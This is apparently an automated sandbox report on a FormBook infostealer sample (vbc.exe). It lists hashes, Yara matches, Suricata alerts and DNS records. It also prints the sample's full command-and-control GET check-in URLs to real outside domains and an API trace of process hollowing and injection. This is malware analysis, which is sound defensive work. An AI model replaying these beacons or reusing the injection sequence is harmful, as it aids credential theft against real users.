popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

vbc.exe

NSIS UPX Malicious Library PE File DLL PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 21, 2021, 8:48 a.m. Oct. 21, 2021, 8:51 a.m.
Size 255.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 36e60a2ecd13869a78ad7bc9312681d0
SHA256 b6d84072166800bd1d35ca9265107d6f26496c7375411ca818046c5a28dee9d9
CRC32 CB26D732
ssdeep 6144:wBlL/c0Wy5g5EupgNkaSYC7hjbUoVhmVuvqQLWT8ZEkzPe7SsGQNN5X:CegGMpSy+HLzzQ5X
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • NSIS_Installer - Null Soft Installer

Name Response Post-Analysis Lookup
www.dealsbonaza.com
CNAME dealsbonaza.com
A 51.210.156.16
51.210.156.16
www.mortgagerates.solutions
A 64.190.62.111
64.190.62.111
www.procurovariedades.com
A 192.185.131.238
CNAME procurovariedades.com
192.185.131.238
www.gatescres.com
CNAME gatescres.com
A 15.197.142.173
A 3.33.152.147
15.197.142.173
www.uggs-line.com
www.taquerialoteria.com
www.877961.com
A 1.32.254.106
1.32.254.106
www.qlfa8gzk8f.com
www.sattaking-gaziabad.xyz
CNAME sattaking-gaziabad.xyz
A 185.28.21.80
185.28.21.80
www.sasanos.com
A 66.29.130.249
66.29.130.249
www.naplesconciergerealty.com
CNAME naplesconciergerealty.com
A 34.102.136.180
34.102.136.180
www.desongli.com
A 108.186.180.79
108.186.180.79
www.technichoffghosts.com
A 45.156.25.115
45.156.25.115
www.beachpawsmobilegrooming.com
CNAME beachpawsmobilegrooming.com
A 34.102.136.180
34.102.136.180
www.bloomberq.online
CNAME bloomberq.online
A 51.81.27.134
51.81.27.134
www.029atk.xyz
A 23.224.179.3
A 172.247.0.172
A 23.225.30.171
A 23.224.130.220
CNAME ch-cname1.com
A 23.224.130.219
A 23.225.30.174
CNAME www.ch-cname1.com
A 23.224.179.6
A 172.247.0.173
A 104.233.181.170
172.247.0.173
www.tbrhc.com
A 154.208.173.145
154.208.173.145
IP Address Status Action
1.32.254.106 Active Moloch
108.186.180.79 Active Moloch
15.197.142.173 Active Moloch
154.208.173.145 Active Moloch
164.124.101.2 Active Moloch
185.28.21.80 Active Moloch
192.185.131.238 Active Moloch
23.225.30.171 Active Moloch
34.102.136.180 Active Moloch
45.156.25.115 Active Moloch
51.210.156.16 Active Moloch
51.81.27.134 Active Moloch
64.190.62.111 Active Moloch
66.29.130.249 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 51.210.156.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 51.210.156.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 51.210.156.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 51.81.27.134:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 51.81.27.134:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 51.81.27.134:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 15.197.142.173:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 1.32.254.106:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 15.197.142.173:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 1.32.254.106:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 15.197.142.173:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 1.32.254.106:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 45.156.25.115:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 45.156.25.115:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 45.156.25.115:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 108.186.180.79:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 108.186.180.79:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 192.185.131.238:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 192.185.131.238:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 108.186.180.79:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 192.185.131.238:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 64.190.62.111:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 64.190.62.111:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 64.190.62.111:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 154.208.173.145:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.29.130.249:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 154.208.173.145:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.29.130.249:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 154.208.173.145:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.29.130.249:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.sattaking-gaziabad.xyz/mxnu/?Bn=UvUEtIev0LW0Fj9rimgEuaxF8o8Q3PSD9GE10acJUnczNTSiUTsn1kpqflxWWG28G9vjgVED&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.tbrhc.com/mxnu/?Bn=dBbPwQ2utUd0Fk1uS+XSFkxz2YTUNCneFR1VLIh1vAwAXkSpHWWkzNznjyqcoekG5m5H1qts&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.bloomberq.online/mxnu/?Bn=o/KNCiHRrXr1o29jsX2904nvUZgzeoF4AFrLsvPkY5gMkei+B/BqpGS5xpPFUL1iDO9N2GeW&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.dealsbonaza.com/mxnu/?Bn=2XZi6uL7RRI0HDIg3Z0ea+lj0YcIWEabg1/ZNYSjdnZm54tZzsSO4EI/xU1ISKPr2aPXOSCI&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.029atk.xyz/mxnu/?Bn=6sRgvWVFBb3Q/xwRSmzppKeefWZYMhtu8mXrbS5z1U4Jv8b+WQjv+VljYqCaCxejjINp6HL4&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.desongli.com/mxnu/?Bn=hZ80obWBB1Dtx9mJDJ/B6KhSbXm9N4IXZ9kDZpitpQpTEQWdqR+8a/o3g7qjE+O8VqYt5r7Y&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.gatescres.com/mxnu/?Bn=/h7P8W3KCMqF8sHgbHgxGw3KDEtccpvlr5o0RXreZvWALZ7/fG1Fr8cUEgi4cFDVX1k6R9aW&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.mortgagerates.solutions/mxnu/?Bn=e40TMWWr6xWVnQ1HwCqLobeJF4L/Z7xCu7/MTKlaRXTCRzwsua34O9neh9w9TPhFkJc6vnSR&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.technichoffghosts.com/mxnu/?Bn=/Fzie1hELeLn7MgSxS1T5SAjvZfamumVbzPuvONP0wKdG4fvdY2IoYOIDGhEOLvFBokHwHx6&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.naplesconciergerealty.com/mxnu/?Bn=hecv2sMFcvsyFIpzJOhZbtwMh1SG6St5/U1aPglBFWownzq2qPNpvMi/ho6Sg43JWpVw027R&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.procurovariedades.com/mxnu/?Bn=e63Yw596e9MjmhIdNsSN67oqb96/kwQ/AvXQ3UsARMy+g2BaAqseTyVnaYCqY6LOFgU8MBS4&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.beachpawsmobilegrooming.com/mxnu/?Bn=3UKcWFD9qZdXpkVuTcyfqHC/sdECx0yJ3q4li0xBqZgcBHBJtb4svrVHA8vfZfIzEwm5PxFs&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.sasanos.com/mxnu/?Bn=vShkcGmQMOINLoOK1pp5XZ1rGlflh1VAH/34JiSotphbghGO08HZN9gmT907Sqcijb1eTDKK&vRitR=7nGDYVy8sr
suspicious_features GET method with no useragent header suspicious_request GET http://www.877961.com/mxnu/?Bn=aHYJt+cF3uKE/jjIR1o9yP3wzE0OqMGB2AjKuxgiPGP7v0vlkCnn7S+a/Vapc30Z99lnekHH&vRitR=7nGDYVy8sr
request GET http://www.sattaking-gaziabad.xyz/mxnu/?Bn=UvUEtIev0LW0Fj9rimgEuaxF8o8Q3PSD9GE10acJUnczNTSiUTsn1kpqflxWWG28G9vjgVED&lvKh=X2MpoVAPDvDTUR1
request GET http://www.tbrhc.com/mxnu/?Bn=dBbPwQ2utUd0Fk1uS+XSFkxz2YTUNCneFR1VLIh1vAwAXkSpHWWkzNznjyqcoekG5m5H1qts&lvKh=X2MpoVAPDvDTUR1
request GET http://www.bloomberq.online/mxnu/?Bn=o/KNCiHRrXr1o29jsX2904nvUZgzeoF4AFrLsvPkY5gMkei+B/BqpGS5xpPFUL1iDO9N2GeW&lvKh=X2MpoVAPDvDTUR1
request GET http://www.dealsbonaza.com/mxnu/?Bn=2XZi6uL7RRI0HDIg3Z0ea+lj0YcIWEabg1/ZNYSjdnZm54tZzsSO4EI/xU1ISKPr2aPXOSCI&lvKh=X2MpoVAPDvDTUR1
request GET http://www.029atk.xyz/mxnu/?Bn=6sRgvWVFBb3Q/xwRSmzppKeefWZYMhtu8mXrbS5z1U4Jv8b+WQjv+VljYqCaCxejjINp6HL4&lvKh=X2MpoVAPDvDTUR1
request GET http://www.desongli.com/mxnu/?Bn=hZ80obWBB1Dtx9mJDJ/B6KhSbXm9N4IXZ9kDZpitpQpTEQWdqR+8a/o3g7qjE+O8VqYt5r7Y&lvKh=X2MpoVAPDvDTUR1
request GET http://www.gatescres.com/mxnu/?Bn=/h7P8W3KCMqF8sHgbHgxGw3KDEtccpvlr5o0RXreZvWALZ7/fG1Fr8cUEgi4cFDVX1k6R9aW&lvKh=X2MpoVAPDvDTUR1
request GET http://www.mortgagerates.solutions/mxnu/?Bn=e40TMWWr6xWVnQ1HwCqLobeJF4L/Z7xCu7/MTKlaRXTCRzwsua34O9neh9w9TPhFkJc6vnSR&lvKh=X2MpoVAPDvDTUR1
request GET http://www.technichoffghosts.com/mxnu/?Bn=/Fzie1hELeLn7MgSxS1T5SAjvZfamumVbzPuvONP0wKdG4fvdY2IoYOIDGhEOLvFBokHwHx6&lvKh=X2MpoVAPDvDTUR1
request GET http://www.naplesconciergerealty.com/mxnu/?Bn=hecv2sMFcvsyFIpzJOhZbtwMh1SG6St5/U1aPglBFWownzq2qPNpvMi/ho6Sg43JWpVw027R&lvKh=X2MpoVAPDvDTUR1
request GET http://www.procurovariedades.com/mxnu/?Bn=e63Yw596e9MjmhIdNsSN67oqb96/kwQ/AvXQ3UsARMy+g2BaAqseTyVnaYCqY6LOFgU8MBS4&lvKh=X2MpoVAPDvDTUR1
request GET http://www.beachpawsmobilegrooming.com/mxnu/?Bn=3UKcWFD9qZdXpkVuTcyfqHC/sdECx0yJ3q4li0xBqZgcBHBJtb4svrVHA8vfZfIzEwm5PxFs&lvKh=X2MpoVAPDvDTUR1
request GET http://www.sasanos.com/mxnu/?Bn=vShkcGmQMOINLoOK1pp5XZ1rGlflh1VAH/34JiSotphbghGO08HZN9gmT907Sqcijb1eTDKK&vRitR=7nGDYVy8sr
request GET http://www.877961.com/mxnu/?Bn=aHYJt+cF3uKE/jjIR1o9yP3wzE0OqMGB2AjKuxgiPGP7v0vlkCnn7S+a/Vapc30Z99lnekHH&vRitR=7nGDYVy8sr
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10009000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2476
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00930000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nsgB75.tmp\dzksq.dll
file C:\Users\test22\AppData\Local\Temp\nsgB75.tmp\dzksq.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2476
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000220
1 0 0
Process injection Process 2284 called NtSetContextThread to modify thread in remote process 2476
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2002059716
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314272
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000218
process_identifier: 2476
1 0 0
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2480
thread_handle: 0x00000218
process_identifier: 2476
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000220
1 1 0

NtGetContextThread

 thread_handle: 0x00000218
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2476
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000220
1 0 0

NtSetContextThread

 registers.eip: 2002059716
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314272
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000218
process_identifier: 2476
1 0 0